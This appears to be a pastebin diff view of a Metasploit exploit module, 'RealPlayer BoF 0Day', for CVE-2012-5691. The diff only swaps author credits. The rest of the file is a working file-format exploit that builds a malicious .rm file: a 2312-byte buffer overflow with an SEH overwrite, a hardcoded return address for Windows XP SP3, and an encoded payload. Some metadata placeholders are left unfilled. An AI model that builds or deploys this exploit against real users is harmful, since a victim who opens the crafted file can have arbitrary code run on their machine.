SHOW:
|
|
- or go back to the newest paste.
| 1 | ## | |
| 2 | # This file is part of the Metasploit Framework and may be subject to | |
| 3 | # redistribution and commercial restrictions. Please see the Metasploit | |
| 4 | # Framework web site for more information on licensing and terms of use. | |
| 5 | # http://metasploit.com/framework/ | |
| 6 | ## | |
| 7 | ||
| 8 | require 'msf/core' | |
| 9 | ||
| 10 | class Metasploit3 < Msf::Exploit::Remote | |
| 11 | #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking | |
| 12 | #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking | |
| 13 | Rank = NormalRanking | |
| 14 | ||
| 15 | include Msf::Exploit::FILEFORMAT | |
| 16 | include Msf::Exploit::Seh | |
| 17 | ||
| 18 | def initialize(info = {})
| |
| 19 | super(update_info(info, | |
| 20 | 'Name' => 'RealPlayer BoF 0Day', | |
| 21 | 'Description' => %q{
| |
| 22 | Buffer overflow with RealMedia files vulnerability | |
| 23 | Affected software: Windows RealPlayer 15.0.6.14 and prior. | |
| 24 | }, | |
| 25 | 'License' => MSF_LICENSE, | |
| 26 | 'Author' => | |
| 27 | [ | |
| 28 | - | 'suto@vnsecurity.net trongnguyen0205@gmail.com', # Original discovery |
| 28 | + | 'suto(https://twitter.com/toanphamvan) ', # Original discovery |
| 29 | - | 'suto', # MSF Module |
| 29 | + | 'trongnguyen0205@gmail.com', # MSF Module |
| 30 | ], | |
| 31 | 'References' => | |
| 32 | [ | |
| 33 | [ 'OSVDB', '<insert OSVDB number here>' ], | |
| 34 | [ 'CVE', 'CVE-2012-5691' ], | |
| 35 | [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] | |
| 36 | ], | |
| 37 | 'DefaultOptions' => | |
| 38 | {
| |
| 39 | 'ExitFunction' => 'process', #none/process/thread/seh | |
| 40 | #'InitialAutoRunScript' => 'migrate -f', | |
| 41 | }, | |
| 42 | 'Platform' => 'win', | |
| 43 | 'Payload' => | |
| 44 | {
| |
| 45 | 'BadChars' => "\x0d", # <change if needed> | |
| 46 | 'DisableNops' => true, | |
| 47 | }, | |
| 48 | ||
| 49 | 'Targets' => | |
| 50 | [ | |
| 51 | [ 'Windows XP SP3', | |
| 52 | {
| |
| 53 | 'Ret' => 0x5acd5121 , | |
| 54 | 'Offset' => 2312 | |
| 55 | } | |
| 56 | ], # pop ebx # pop esi # ret - rpap3260.dll | |
| 57 | ], | |
| 58 | 'Privileged' => false, | |
| 59 | #Correct Date Format: "M D Y" | |
| 60 | #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec | |
| 61 | 'DisclosureDate' => 'MONTH DAY YEAR', | |
| 62 | 'DefaultTarget' => 0)) | |
| 63 | ||
| 64 | register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
| |
| 65 | ||
| 66 | end | |
| 67 | ||
| 68 | def exploit | |
| 69 | content = "[InternetShortcut]\nURL=" | |
| 70 | buffer = "A"*2312 | |
| 71 | buffer << generate_seh_record(target.ret) | |
| 72 | buffer << make_nops(30) | |
| 73 | buffer << payload.encoded #522 bytes of space | |
| 74 | filecontent = content+buffer+"B"*5000 | |
| 75 | file_create(filecontent) | |
| 76 | ||
| 77 | end | |
| 78 | end |
